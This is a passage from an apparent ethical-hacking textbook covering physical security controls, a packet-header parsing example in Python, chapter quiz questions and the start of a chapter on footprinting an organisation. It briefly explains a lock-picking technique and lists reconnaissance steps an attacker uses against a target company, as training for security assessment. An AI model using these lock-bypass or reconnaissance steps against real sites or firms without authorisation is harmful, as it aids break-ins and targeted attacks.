Working in concert with doors are the walls that the doors or mantraps are embedded into. A reinforced wall can keep a determined attacker from entering an area through any point other than the defined doors. On the other hand, a poorly constructed wall may present no obstacle at all and allow an intruder to kick through. Construction of walls should take into consideration several factors in addition to security, such as the capability to slow the spread of fires. Walls should run from the slab to the roof. Consider one of the more common mistakes that can be a detriment to security: the false wall. These are walls that run from the floor up to the ceiling, but the ceiling isn't real; it's but a drop ceiling that has a good amount of space between it and the roof. An attacker needs only a table, a chair, or a friend for a foothold to push up the ceiling tile and climb over. If asked to perform a physical security assessment of a data center or other type of high-value physical asset, check to see that the wall runs past the drop ceiling. Also tap on the wall gently and check to see whether it is hollow or of a solid construction. For ceilings, the weight-bearing load and fire ratings must be considered. For dropped ceilings, the walls should extend above the ceiling, especially in sensitive areas. Any ceiling-mounted air ducts should be small enough to prevent an intruder from crawling through them. The slab of the facility needs to have the proper weight load, fire rating, and drains. When dealing with raised floors, you will want to make sure the flooring is
grounded and nonconducting. In areas with raised floors, the walls should extend below the false floor.

NOTE: A common decorative feature is the glass block wall commonly seen in locations such as doctors' offices or lobbies. While such structures and designs do look attractive, they can very easily be seen through, and a kick of a boot can get through most designs.

## Windows

Windows serve several purposes in any building or workplace: "opening up" the office to let more light in and giving the inhabitants a look at the world outside. But what about the security aspect? While windows let people enjoy the view, security can never be overlooked. Depending on the placement and use of windows, anything from tinted to shatterproof windows may be required to ensure that security is preserved. It is also important to consider that in some situations the windows may need to be enhanced through the use of sensors or alarms. Window types include the following:

• Standard — The lowest level of protection. It's cheap, but easily shattered and destroyed.
• Polycarbonate acrylic — Much stronger than standard glass, this type of plastic offers superior protection.
• Wire reinforced — Adds shatterproof protection and makes it harder for an intruder to break and access.
• Laminated — Similar to what is used in an automobile. By adding a laminate between layers of glass, the strength of the glass is increased and shatter potential is decreased.
• Solar film — Provides a moderate level of security and decreases shatter potential.
• Security film — Used to increase the strength of the glass in case of breakage or explosion.

## Guards and Dogs

For areas where proper doors, fences, gates, and other structures cannot offer the required security, other options include guards or dogs.
Guards can serve several functions just by being present: guards can be very real deterrents in addition to introducing the "human element" of security; they have the ability to make decisions and think through situations. While computerized systems can provide vital security on the physical side, such systems have not reached the level where the human element can be replaced. Guards add discernment to on-site security.

Of course, as the old saying goes, "You don't get something for nothing," and guards are no exception to this old rule. Guards need to be screened before hiring, background checks and criminal background checks need to be performed, and, if needed, security clearances must be obtained. Interestingly enough, however, increased technology has in part driven the need for security guards. More and more businesses have closed-circuit television (CCTV), premise control equipment, intrusion detection systems, and other computerized surveillance devices. Guards can monitor such systems. They can fill dual roles, and monitor, greet, and escort visitors, too.

Guards cost money. However, if a company does not have the money for a guard, there are other options. Dogs have been used for centuries for perimeter security. Breeds such as German shepherds guard facilities and critical assets. While it is true that dogs are loyal, obedient, and steadfast, they are not perfect and might possibly bite or harm the wrong person because they do not have the level of discernment that human beings possess. Because of these factors, dogs are usually restricted to exterior premise control and should be used with caution.

## Construction

Construction of a facility has as much to do with the environment in which the facility is to be located as it does with the security it will be responsible for maintaining.
As an example, a facility built in Tulsa, Oklahoma, has much different requirements from one built in Anchorage, Alaska. One is concerned with tornadoes; the other with snowstorms. The security professional is expected in most cases to provide input on the design or construction of a new facility or the functionality of a preexisting facility that the company is considering. When this situation arises, consider the following factors:

• What are the unique physical security concerns of the organization's operations?
• Do redundancy measures exist (such as backup power or coverage by multiple telecom providers)?
• Is the location particularly vulnerable to riots or terrorism?
• Are there any specific natural/environmental concerns for the specific region in which construction is being considered?
• Is the proposed construction close to military bases, train tracks, hazardous chemical production areas, or other hazards?
• Is the construction planned in high-crime neighborhoods?
• How close is the proposed construction to emergency services such as the hospital, fire department, and police station?

# Personal Safety Controls

The bulk of what has been discussed up to this point has focused on the protection of assets such as computers, facilities, and data; however, the human factor has been overlooked. Any security plan must address the protection and security of all assets, and this absolutely includes both silicon-based assets and carbon-based ones. There is a wide assortment of technologies specifically designed to protect not only people but also the organization itself, including the following:

• Lighting
• Alarms
• CCTV

## Lighting

Lighting is perhaps one of the lowest-cost security controls that can be implemented by an organization. Lighting can provide a welcome addition to locations such as parking garages and building perimeters. Consider the fact that when properly placed,
lighting can eliminate shadows and the spots that cameras or guards can't monitor, as well as reduce the places in which an intruder can hide. Effective lighting means the system is designed to put the light where it is needed and in the proper wattage as appropriate. Lights are designed for specific types of applications. Some of the more common types of lights include these:

• Continuous — Fixed lights arranged to flood an area with overlapping cones of light (most common)
• Standby — Randomly turned on to create an impression of activity
• Movable — Manually operated movable search lights; used as needed to augment continuous or standby lighting
• Emergency — Can duplicate any or all of the previous lights; depends on an alternative power source

Two issues that occur with lighting are overlighting and glare. Too much light, or overly bright lights, can bleed over to the adjacent owner's property and be a source of complaints. Too much light can also lead to a false sense of security because a company may feel that because all areas are lit, intrusion is unlikely. Additionally, when lighting is chosen incorrectly, it is possible to introduce high levels of glare. Glare can make it tough for those tasked with monitoring an area to observe all the activities that may be occurring. When placing lighting, avoid any placement that directs the lighting toward the facility and instead direct the lights toward fences, gates, or other areas of concern such as access points. Also consider the problems associated with glare when guards are present; for example, if guards are tasked with checking IDs at a checkpoint into a facility, ensure that the lights are not directed toward the guards. This offers good glare protection to the security force and guards.

## Alarms and Intrusion Detection

Alarms and physical intrusion detection systems can also increase physical security.
Alarms typically are used to provide an alert mechanism if a potential break-in or fire has been detected. Alarms can have a combination of audible and visual indicators that allow people to see and hear the alarm and react to the alert. Alarms are of no use if no one can hear or see the alert and respond accordingly. More advanced alarm systems even include the ability to contact fire or police services if the alarm is activated after business hours, for example. Of course, a drawback is the simple fact that if an alarm system is tied to the police or fire department, false alarms could result in being assessed fines.

Additional options that can enhance physical intrusion detection are motion, audio, infrared wave pattern, and capacitance detection systems. Of these systems, infrared detection tends to be one of the most common, but like any system, these have both pros and cons. Infrared systems are expensive and they may be larger than other comparable devices, but at the same time the systems can detect activity outside the normal visual range. Another popular form of intrusion detection system is the device sensitive to changes in weight, and such systems may be useful when used with mantraps because they can detect changes in weight that may signal a thief.

If asked to provide guidance to an organization on what type of IDS to consider implementing, always take the situation into account. What is important to avoid is placing a too-complex or inappropriate IDS for the given situation. For example, systems that detect weight changes may not be as important or may even be completely unnecessary in situations where theft is not a concern. Also keep in mind that IDSs are not foolproof and are not an excuse for avoiding using common sense or other security controls. Any guidance on what type of IDS to implement should also mention that human involvement is essential.
## Closed-Circuit TV (CCTV)

Another mechanism that can be used to protect people and potentially deter crime is CCTV. CCTV usually works in conjunction with guards or other monitoring mechanisms to extend their capacity. When dealing with surveillance devices, you must understand factors such as focal length, lens types, depth of field, and illumination requirements. As an example, the requirements of a camera that will be placed outside in an area of varying light are much different from those of one placed inside in a fixed lighting environment. Also, there is the issue of focal length, which defines the camera's effectiveness in viewing objects from a horizontal and vertical view. Short focal lengths provide wider-angle views, while longer focal lengths provide narrower views. When considering placement of CCTV, keep in mind areas such as perimeter entrances and critical access points. Activity can be either monitored live by a security officer, or recorded and reviewed later. If no one is monitoring the CCTV system, it effectively becomes a detective control because it will not prevent a crime. In these situations, the organization is effectively alerted to the crime only after the fact, when the recordings are reviewed.

NOTE: Modern CCTV systems can provide additional features such as the ability to alert the monitoring agency or organization in the form of e-mail or other similar methods. These systems can be said to be smart in that they can even be configured in some instances to send these alerts only during certain hours.

# Physical Access Controls

A physical access control can be defined as any mechanism by which an individual can be granted or denied physical access. One of the oldest forms of access control is the mechanical lock. Other types of physical access control include ID badges, tokens, and biometrics.

## Locks

Locks, which come in many types, sizes, and shapes, are an effective means of physical access control.
Locks are by far the most widely implemented security control due largely to the wide range of options available as well as the low costs of the devices. Lock types include the following:

• Mechanical — Warded and pin and tumbler
• Cipher — Smart and programmable

Warded locks are the simplest form of mechanical lock. The design of these mechanical locks uses a series of wards that a key must match up to in order to open the lock. While it is the cheapest type of mechanical lock, it is also the easiest to pick. Pin and tumbler locks are considered more advanced. These locks contain more parts and are harder to pick than warded locks. When the correct key is inserted into the cylinder of a pin and tumbler lock, the pins are lifted to the right height so that the device can open or close. More advanced and technically complex than warded or pin and tumbler locks are cipher locks, which have a keypad of fixed or random numbers that requires a specific combination to open the lock.

Before selecting a lock, consider the fact that not all locks are alike, and locks come in different grades. The grade of the lock specifies its level of construction. The three basic grades of locks are as follows:

• Grade 1 — Commercial locks with the highest security
• Grade 2 — Light-duty commercial locks or heavy-duty residential locks
• Grade 3 — Consumer locks with the weakest design

NOTE: Although a Grade 3 lock is fine for use in residential applications, it is not acceptable for a critical business asset. Always check the grade of a lock before using it to protect the assets of a company.

## Lock Picking

While locks are good physical deterrents and work quite well as a delaying mechanism, a lock can be bypassed through lock picking. Criminals tend to pick locks because it is a stealthy way to bypass a lock and can make it harder for the victim to determine what has happened.
The basic components used to pick locks are these:

• Tension wrenches — Like small, angled flathead screwdrivers. They come in various thicknesses and sizes.
• Picks — Just as the name implies, similar to dentist picks: small, angled, and pointed.

Together, these tools can be used to pick a lock. One example of a basic technique used to pick a lock is scraping. With this technique, tension is held on the lock with the tension wrench while the pins are scraped quickly. Pins are then placed in a mechanical bind and will be stuck in the unlocked position. With practice, this can be done quickly so that all the pins stick and the lock is disengaged.

Tokens and Biometrics

Tokens and biometrics are two ways to control individuals as they move throughout a facility or attempt to access specific areas. Tokens are available in many types and can range from basic ID cards to more intelligent forms of authentication systems. Tokens used for authentication can make an access decision electronically and come in several different configurations, including the following:

• Active electronic — The access card has the ability to transmit electronic data.
• Electronic circuit — The access card has an electronic circuit embedded.
• Magnetic stripe — The access card has a stripe of magnetic material.
• Magnetic strip — The access card contains rows of copper strips.
• Contactless cards — The access card communicates with the card reader electronically.

Contactless cards do not require the card to be inserted or slid through a reader. These devices function by detecting the proximity of the card to the sensor. An example of this technology is radio frequency ID (RFID). An RFID tag is an extremely small electronic device that is composed of a microchip and an antenna. Many RFID devices are passive devices. Passive devices have no battery or power source because they are powered by the RFID reader.
The reader generates an electromagnetic signal that induces a current in the RFID tag.

Another form of authentication is biometrics. Biometric authentication is based on a behavioral or physiological characteristic that is unique to an individual. Biometric authentication systems have gained market share because they are seen as a good replacement for password-based authentication systems. Different biometric systems have various levels of accuracy. The accuracy of a biometric device is measured by the percentage of Type 1 and Type 2 errors it produces. Type 1 errors, or false rejections, are reflected by what is known as the false rejection rate (FRR). This is a measurement of the percentage of individuals who should have been granted access but were not. A Type 2 error, or false acceptance, is reflected by the false acceptance rate (FAR), which is a measurement of the percentage of individuals who gained access but should not have been granted it. The two rates trade off against each other: loosening the match threshold lowers the FRR but raises the FAR, and tightening it does the reverse. The setting at which the two rates are equal is called the crossover error rate and is the usual figure for comparing one system with another.

NOTE Before purchasing a lock picking set, be sure to investigate local laws on the matter. In some states, the mere possession of a lock picking set can be a felony.
In other states, possession of a lock picking set is not a crime in and of itself, but using the tools during the commission of a crime is.

Some common biometric systems include the following:

• Finger scan systems — Widely used, popular, installed in many new laptops
• Hand geometry systems — Accepted by most users; functions by measuring the unique geometry of a user's fingers and hand to identify them
• Palm scan systems — Much like the hand geometry system, except it measures the creases and ridges of a user's palm for identification
• Retina pattern systems — Very accurate; examines the pattern of blood vessels on the retina at the back of the user's eye
• Iris recognition — Another eye recognition system that is also very accurate; it matches the pattern of the iris, the colored ring around the pupil
• Voice recognition — Determines who you are by using voice analysis
• Keyboard dynamics — Analyzes the user's speed and pattern of typing

No matter what means of authentication you use, a physical access control needs to fit the situation in which it will be applied. As an example, if the processing time of a biometric system is slow, users tend to just hold the door open for others rather than wait for the additional processing time. Another example is an iris scanner, which may be installed at all employee entrances, yet later causes complaints from employees who are physically challenged or in wheelchairs because they cannot easily use the newly installed system. Consider who will be using the system and whether it is appropriate given the situation and user base.

Avoiding Common Threats to Physical Security

With so much talk in this chapter of controls and items to look for during an assessment, it is important to be aware of some of the threats an organization can face.
Some common threats include these:

• Natural, human, and technical threats
• Physical keyloggers
• Sniffers
• Wireless interception
• Rogue access points

Natural, Human, and Technical Threats

Every organization must deal with the threats that are present in the environment each day. Threats can be natural, human, or technical. Natural threats can include items such as fires, floods, hurricanes, tropical storms, tidal waves, and earthquakes. Human threats are not always as predictable as natural threats. For example, anyone living in California knows that earthquakes will hit, but they just can't say when. However, an organization may expect someone to attempt or even succeed in breaking in to the company, but the attempt may never come. The point here is that aside from natural disasters, you must think of other threats such as hackers, who do not issue notices when an attack is coming. Any organization can be threatened by outsiders or insiders: people that are apparently trusted or unknown individuals. Human threats can include the following:

• Theft — Theft of company assets can range from mildly annoying to extremely damaging. A CEO's laptop may be stolen from the hotel lobby, but is the real loss the laptop or the plans for next year's new software release?
• Vandalism — From broken windows caused by a teenager just having some malicious fun to the hacker who decides to change your company's Web page, each is destroying company property.
• Destruction — This threat can come from insiders or outsiders. Destruction of physical assets can cost organizations money that was destined to be spent on other items.
• Terrorism — This form of threat is posed by individuals or groups that wish to prove a point or draw attention to a cause.
• Accidental — Accidents are bound to happen sooner or later, and their effects can vary depending on the situation.
Damage could range from lost data to an attacker obtaining access where they should not have.

Any company can also be at risk due to technical issues. A truck driver can knock down a power pole in front of the company, or a hard drive in a server might fail. Each can and will affect the capability of the company to continue to provide needed services. Whenever a security professional is asked to perform a physical review, don't neglect the physical controls that are needed to protect against these or any of the various types of issues that are present. Any equipment failure and loss of service can affect the physical security of the organization.

Physical Keyloggers and Sniffers

Hardware keyloggers are physical devices used to record everything a person types on the keyboard. These devices are usually installed while the user is away from the desk. Keystroke loggers can be used for legal or illegal purposes, such as the following:

• Monitoring employee productivity and computer activity
• Law enforcement
• Illegal spying

Physical keyloggers can store millions of keystrokes on a small device that is plugged in between the keyboard and the computer. Some keyloggers are built into keyboards. The process is transparent to the end user and can be detected only by finding the keylogger. Keyloggers can be the following:

• Attached to the keyboard cable, as inline devices
• Installed inside standard keyboards
• Installed inside replacement keyboards
• Installed on a system along with other software

Sniffing is the basis for a large number of network-based attacks. If attackers can gain access to the network via a physical network connection, they can begin to capture traffic. Sniffing can be passive or active.
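What a sniffer on such a physical connection actually sees is a stream of raw frames, and every field it reports (the source and destination pairs in Figure 4-1, the ports, the TCP flags, the payload) comes from walking the Ethernet, IP and TCP headers byte by byte. The following is an added example, not code from the book or from Wireshark, that does that walk for one frame in Python. Capturing the frames themselves needs a raw socket or libpcap and administrator privileges, so this example leaves capture aside and instead builds a sample frame with build_frame(); the MAC addresses, IP addresses and ports in it are made up for the illustration, not taken from a real capture.

```python
"""Decode one raw frame the way a sniffer on a physical network tap would.

Added example, not code from the book or from Wireshark. It parses the
Ethernet II, IPv4 and TCP headers of a frame, verifies the IPv4 header
checksum, and returns the fields a sniffer displays. build_frame()
constructs the sample frame; its addresses and ports are made up for the
example, not a real capture.
"""
import socket
import struct

TCP_FLAGS = (("FIN", 0x01), ("SYN", 0x02), ("RST", 0x04),
             ("PSH", 0x08), ("ACK", 0x10), ("URG", 0x20))


def ipv4_checksum(header: bytes) -> int:
    """RFC 791 checksum: one's-complement sum of 16-bit words, complemented."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def flag_names(bits: int) -> list:
    return [name for name, bit in TCP_FLAGS if bits & bit]


def mac_str(raw: bytes) -> str:
    return ":".join("%02x" % b for b in raw)


def parse_frame(frame: bytes) -> dict:
    """Return the sniffer-visible fields of an Ethernet/IPv4/TCP frame.

    Raises ValueError for frames that are truncated, not IPv4 over Ethernet,
    not TCP, or whose IPv4 header checksum fails (corrupted or badly forged).
    """
    if len(frame) < 14:
        raise ValueError("truncated Ethernet header")
    dst_mac, src_mac, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != 0x0800:
        raise ValueError("not IPv4 (ethertype 0x%04x)" % ethertype)

    ip = frame[14:]
    if len(ip) < 20:
        raise ValueError("truncated IPv4 header")
    (ver_ihl, _tos, total_len, _ident, _frag, ttl, proto, csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or len(ip) < ihl:
        raise ValueError("bad IPv4 version or header length")
    # Recompute the header checksum with the checksum field zeroed.
    if ipv4_checksum(ip[:10] + b"\x00\x00" + ip[12:ihl]) != csum:
        raise ValueError("IPv4 header checksum mismatch")
    if proto != 6:
        raise ValueError("not TCP (protocol %d)" % proto)

    tcp = ip[ihl:total_len]
    if len(tcp) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, ack, off_flags, _win = struct.unpack("!HHIIHH", tcp[:16])
    data_off = (off_flags >> 12) * 4      # TCP header length incl. options
    return {
        "src_mac": mac_str(src_mac), "dst_mac": mac_str(dst_mac),
        "src_ip": socket.inet_ntoa(src), "dst_ip": socket.inet_ntoa(dst),
        "ttl": ttl, "src_port": sport, "dst_port": dport, "seq": seq,
        "flags": flag_names(off_flags & 0x1FF), "payload": tcp[data_off:],
    }


def build_frame(src_mac, dst_mac, src_ip, dst_ip, sport, dport, payload,
                ttl=64, flags=0x18, seq=0, ack=0) -> bytes:
    """Assemble a minimal Ethernet/IPv4/TCP frame. Only the IPv4 header
    checksum is computed (that is what parse_frame checks); the TCP checksum
    is left at zero for brevity."""
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, ack,
                      (5 << 12) | flags, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x028B, 0x4000,
                     ttl, 6, 0, socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip = ip[:10] + struct.pack("!H", ipv4_checksum(ip)) + ip[12:]
    eth = (bytes.fromhex(dst_mac.replace(":", "")) +
           bytes.fromhex(src_mac.replace(":", "")) + struct.pack("!H", 0x0800))
    return eth + ip + tcp


# Constructed sample: a printer-port (515/tcp) segment between two LAN hosts.
SAMPLE_FRAME = build_frame("00:a0:c5:21:19:8d", "00:09:5b:1f:2b:58",
                           "192.168.123.151", "192.168.123.101",
                           515, 3200, b"\x02lp\n", ttl=32)

if __name__ == "__main__":
    for key, value in parse_frame(SAMPLE_FRAME).items():
        print("%-9s %s" % (key, value))
```

The checksum check is what separates a decoder from a dumper: a sniffer that trusts every header it sees will happily report the forged or damaged frames that active sniffing techniques inject, so rejecting frames whose IPv4 checksum does not verify is the first sanity check worth applying to anything pulled off the wire.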
Passive sniffing relies on a feature of network cards called "promiscuous mode." When placed in promiscuous mode, a network card passes all packets on to the operating system, rather than just those unicast or broadcast to the host. Active sniffing, on the other hand, relies on injecting packets into the network, causing traffic that should not be sent to your system to be sent to your system. Active sniffing was developed largely in response to switched networks, where a switch forwards each frame only to the port of its destination and promiscuous mode alone sees little of interest. Sniffing is dangerous in that it allows hackers access to traffic they should not see. An example of a sniffer capture is shown in Figure 4-1.

NOTE Even if the IT or security department of your company is planning to use these devices for legal purposes, always consult with a lawyer or with the human resources department. Use of such devices in some instances can be a serious legal issue and expose the company to legal action.

FIGURE 4-1 Wireshark sniffer. (Packet detail pane for a captured TCP segment from 192.168.123.151 to 192.168.123.101; the screenshot itself is not reproduced here.)

Wireless Interception and Rogue Access Points

While you will read more about wireless networks and their security vulnerabilities in Chapter 8, we will mention some of the basics here as a brief introduction. Sniffing is not restricted to wired networks. Wireless signals emanating from cell phones, wireless local area networks (WLANs), Bluetooth devices, and other modern equipment can also be intercepted and analyzed by an attacker with the right equipment. Even when signals cannot be intercepted, they can still potentially be jammed. For example, a cell phone jammer could transmit a signal on the same frequencies that cell phones do and then prevent all cell phone communication within a given area.

Moving on to other current technologies, the discussion now turns to another wireless technology: Bluetooth, which is a short-range communication technology that has been shown to be vulnerable to attack. One such attack is bluejacking, which allows an individual to send unsolicited messages over Bluetooth to other Bluetooth devices. WLANs are also vulnerable to attacks. These attacks can be categorized into four basic categories: eavesdropping, open authentication, rogue access points, and denial of service. Finally, the attacker may attempt to set up a fake access point to intercept wireless traffic. Such techniques make use of a rogue access point. This fake access point is used to launch a man-in-the-middle attack. Attackers simply place their own access points in the same area as users and attempt to get them to log on.

Defense in Depth

NOTE Another way to think of defense in depth is as avoiding putting all your eggs in one basket.
Something that has been mentioned indirectly a few times already is the concept of defense in depth. The concept of defense in depth originated in the military and was seen as a way to delay rather than prevent an attack. As an information security tactic, it is based on the concept of layering more than one control. These controls can be physical, administrative, or technical in design. We have looked at a variety of physical controls in this chapter, such as locks, doors, fences, gates, and barriers. Administrative controls include policies and procedures on (among other things) how you recruit, hire, manage, and fire employees. During employment, administrative controls such as least privilege, separation of duties, and rotation of duties are a few of the items that must be enforced. When employees leave or are fired, their access needs to be revoked, accounts blocked, property returned, and passwords changed. Technical controls are another piece of defense in depth and can include items such as encryption, firewalls, and IDS.

For the physical facility, a security professional should strive for a minimum of three layers of physical defense. The first line of defense is the building perimeter. Barriers placed here should delay and deter attacks. Items at this layer include fences, gates, and bollards. These defenses should not reduce the visibility of CCTV and/or guards. Items such as shrubs should be 18 to 24 inches away from all entry points, and hedges should be cut six inches below the level of all windows.

The second layer of defense is the building exterior: roof, walls, floor, doors, and ceiling. Windows are a weak point here. Any opening 18 feet or less above the ground should be considered a potential easy access point and should be secured if greater than 96 square inches.
The third layer of physical defense is the interior controls: locks, safes, containers, cabinets, and interior lighting. It can even include policies and procedures that cover what controls are placed on computers, laptops, equipment, and storage media. This third layer of defense is important when you consider items such as the data center or any servers kept onsite. A well-placed data center should not be above the second floor of a facility because a fire might make it inaccessible. Likewise, you wouldn't want the data center located in the basement because it could be subject to flooding. A well-placed data center should have limited accessibility, typically no more than two doors. Keep these items in mind because they will help you secure the facility.

CHAPTER SUMMARY

This chapter is unique in that so much of ethical hacking and penetration testing is about IT and networks. However, the reality is that attackers will target an organization any way that they can. Not all attacks will be logical in nature; many are physical. If attackers can gain physical access to a facility, many potentially damaging actions can occur, from simply unplugging a server and walking out with it to sniffing traffic on the network. Physical controls can take many forms and be implemented for any number of reasons. Consider that physical controls such as doors, fences, and gates represent some of the first barriers that an attacker will encounter. When constructed and placed properly, fences can provide a tremendous security benefit, stopping all but the most determined attacker. Other types of controls that can be layered into the existing physical security system include alarm and intrusion detection systems, both of which provide an early warning of intrusions.

KEY CONCEPTS AND TERMS

Biometrics
Bluetooth
Bollard
False acceptance rate (FAR)
False rejection rate (FRR)
Lock
Turnstile

CHAPTER 4 ASSESSMENT

1. Physical security is less important than logical security.
   A. True
   B. False

2. ____ is a common physical control that can be used as both a detective and reactive tool.
   A. A fence
   B. An alarm
   C. CCTV
   D. A lock

3. For a fence to deter a determined intruder, it should be at least ____ feet tall.
   A. Four
   B. Five
   C. Six
   D. Ten

4. A(n) ____ is used to prevent cars from ramming a building.

5. While guards and dogs are both good for physical security, which of the following more commonly applies to dogs?
   A. Liability
   B. Discernment
   C. Dual role
   D. Multifunction

6. What grade of lock would be appropriate to protect a critical business asset?
   A. Grade 4
   B. Grade 2
   C. Grade 1
   D. Grade 3

7. ____ defines the camera's effectiveness in viewing objects from a horizontal and vertical view.
   A. Granularity
   B. Ability to zoom
   C. Field of view
   D. Focal length

8. In the field of IT security, the concept of defense in depth is layering more than one control on another.
   A. True
   B. False

9. ____ is an intrusion detection system used exclusively in conjunction with fences.
   A. Infrared wave pattern
   B. Motion detector
   C. RFID
   D. FIDAS

10. A Type 2 error is also known as what?
   A. False rejection rate
   B. Failure rate
   C. Crossover error rate
   D. False acceptance rate

11. Which type of biometric system is frequently found on laptops?
   A. Retina
   B. Fingerprint
   C. Iris
   D. Voice recognition

12. What do lock pick sets typically contain at a minimum?
   A. Tension wrenches and drivers
   B. A pick
   C. A pick and a driver
   D. A pick and a tension wrench

13. During an assessment you discovered that the target company was using a fax machine. Which of the following is the least important?
   A. The phone number is publicly available.
   B. The fax machine is in an open, unsecured area.
   C. Faxes frequently sit in the printer tray.
   D. The fax machine uses a ribbon.
PART TWO A Technical Overview of Hacking

CHAPTER 5 Footprinting Tools and Techniques 106
CHAPTER 6 Port Scanning 137
CHAPTER 7 Enumeration and Computer System Hacking 159
CHAPTER 8 Wireless Vulnerabilities 186
CHAPTER 9 Web and Database Attacks 209
CHAPTER 10 Malware, Worms, and Viruses 232
CHAPTER 11 Trojans and Backdoors 252
CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks 276
CHAPTER 13 Linux, Live CDs, and Automated Assessment Tools 299

CHAPTER 5 Footprinting Tools and Techniques

WHEN THINKING ABOUT HACKING into systems, you might think that hackers simply use a few software tools to gain access to the target. Although it is true that there are a multitude of tools available to facilitate this very action, effective hacking is a process that takes place in phases. Each phase in the hacking process should be undertaken with the goal of uncovering increasingly useful information about a target that can be used in the eventual break-in. The first phase of hacking is the footprinting phase, which is specifically designed to passively gain information about a target. If done correctly and patiently, it is possible for skilled attackers to gain valuable information about their intended target without alerting the victim to the impending attack. The information that can be gained during this phase can be somewhat surprising, because it includes items such as network range, equipment and technologies in use, financial information, locations, physical assets, and employee names and titles. A typical company generates a wealth of information as a byproduct of its operations, and such information can be used for any purpose that an attacker may have in mind. In this chapter, the process that hackers use will be introduced along with the techniques that are used during each step of the process.
An understanding of the techniques that hackers use will provide valuable insight into not just the mechanics of the process but also how to thwart them in the real world. In this chapter, special emphasis will be placed upon the first of the phases: footprinting.

Chapter 5 Topics

This chapter covers the following topics and concepts:

• What the information-gathering process entails
• What type of information can be found on an organization's Web site
• How attackers discover financial information
• What the nature of Google hacking is
• How to explore domain information leakage
• How to track an organization's employees
• How insecure applications are exploited
• How to use some basic countermeasures

Chapter 5 Goals

When you complete this chapter, you will be able to:

• State the purpose of footprinting
• List the types of information typically found on an organization's Web site
• Identify sources on the World Wide Web used for footprinting
• Show how attackers map organizations
• Describe the types of information that can be found about an organization's key employees
• List examples of unsecured applications used by organizations
• Identify Google hacking

The Information-Gathering Process

Although this chapter will place emphasis on the footprinting phase of the hacking and information-gathering process, seven steps are actually used. The steps of the information-gathering process include:

1. Gathering information
2. Determining the network range
3. Identifying active machines
4. Finding open ports and access points
5. Detecting operating systems
6. Using fingerprinting services
7. Mapping the network

Of the seven steps, footprinting covers the first two steps in the process. Note that steps 1 and 2 are both passive in nature; they do not require direct interaction with the victim.
This is one of the key characteristics of footprinting: to gather information about a victim without directly interacting and potentially providing advance notice of the attack. The following list shows some of the activities an attacker can perform when footprinting an organization:

• Examine the company's Web site
• Identify key employees
• Analyze open positions and job requests
• Assess affiliate, parent, or sister companies
• Find technologies and software used by the organization
• Determine network address and range
• Review the network range to determine whether the organization is the owner or if the systems are hosted by someone else
• Look for employee postings, blogs, and other leaked information
• Review collected data

Under the right conditions, a skilled hacker can gather the information mentioned here and use the results to fine-tune what will be scanned or probed on the victim. Remember that the most effective tools that can be employed during this phase are common sense and detective work. You must be able to look for the places where a company may have made information available and seek such information. In fact, footprinting may be the easiest part of the hacking process because most organizations generate massive amounts of information that is made available online. Before a skilled hacker fires up an active tool, such as a port scanner or password cracker, he or she will meticulously carry out the footprinting process to plan and coordinate a more effective attack.

The Information on a Company Web Site

When starting the footprinting phase, do not overlook some of the more obvious sources of information, including the company's Web site. As anyone who has used the Internet can attest, Web sites offer various amounts of information about an organization because the Web site has been published to tell customers about the organization.
Although Web sites contain much less sensitive data now than was seen in the past, it is still not uncommon to come across Web sites that contain e-mail addresses, employee names, branch office locations, and technologies the organization uses. An example of an average Web site and some information you might find is shown in Figure 5-1. One problem with Web sites that has only recently been overcome is the amount of sensitive information that can be accessed by the public. Sometimes without even realizing it, a company will publish a piece of information that seems insignificant, but to an attacker that same information may be gold. Consider a practice that used to be quite common: the posting of company directories on the company Web site. Such information may not seem like a problem, except that it gives an attacker valuable contact information for employees that may be used to impersonate these individuals. Of course, what is valuable is not just what is visible on a Web site; it can also be the source code or HTML that is used to design the site. It is possible for a particularly astute attacker to browse through the source code and locate comments or other pieces of information that can give insight into an organization.

FIGURE 5-1 Company management. (Screenshot of a sample company site, Superior Solutions, Inc., showing its mission statement, About Us page, and management biographies; the image itself is not reproduced here.)

The following is an example of HTML code with comments:

<html>
<head>
<title>Company Web page</title>
</head>
<body>
<!-- This Web page prompts for the password to login to the database server HAL9000 -->
</body>
</html>


NOTE Site ripping tools such as BlackWidow Pro or Wget can be used to extract a complete copy of the Web site.

The comment included here may seem harmless, but it would tell an attacker the name of the server that is being accessed, assisting in targeting an attack.

Over the last decade, companies have gotten the message that posting some information on the company Web site is not advisable. In some cases, organizations have removed information that could reveal details about internal processes, personnel, and other assets. On the surface, it would seem that once information is removed from a Web site the problem is eliminated, but this is far from true. The state of a Web site at a particular point in time may still exist somewhere out in cyberspace. One of the tools that a security professional can use to gain information about a past version of a Web site is the Wayback Machine. It is a Web application created by the Internet Archive that takes "snapshots" of a Web site at regular intervals and makes them available to anyone who looks. With the Wayback Machine, it is possible to recover information that was posted on a Web site sometime in the past. However, the information may be hopelessly out of date and of limited use. The Wayback Machine is available at http://www.archive.org/. An example of this Web site is shown in Figure 5-2.

When a Web site address is entered into the Wayback Machine, the site will return a list of dates representing when a Web site was archived, with an asterisk next to any date on which a change was made. Although the Internet Archive does not keep exhaustive results on every Web site, the Web sites it does archive can stretch all the way back to 1996. Currently the Internet Archive has a sizable amount of content cataloged, estimated to be in excess of 150 billion Web pages and related content. Of note is the fact that not every Web site on the Internet is archived, and those that are may not always go back far enough to reveal any useful information. Another potential drawback is that a site administrator, through use of a file called robots.txt, can ask the Internet Archive not to make snapshots of the site, denying anyone the use of old information. Figure 5-3 shows an example of how far back Web pages go for a specific company.

NOTE The Internet Archive is intended to be a historical archive of the Internet for the purposes of research and historical interest. Originally started in 1996, the Internet Archive has grown to include the archived versions of more than 150 billion Web pages; the archive has since been enhanced to include text, video, images, and other content.

FIGURE 5-2 Wayback Machine query. (Screenshot of the Wayback Machine search form at the Internet Archive; the image itself is not reproduced here.)

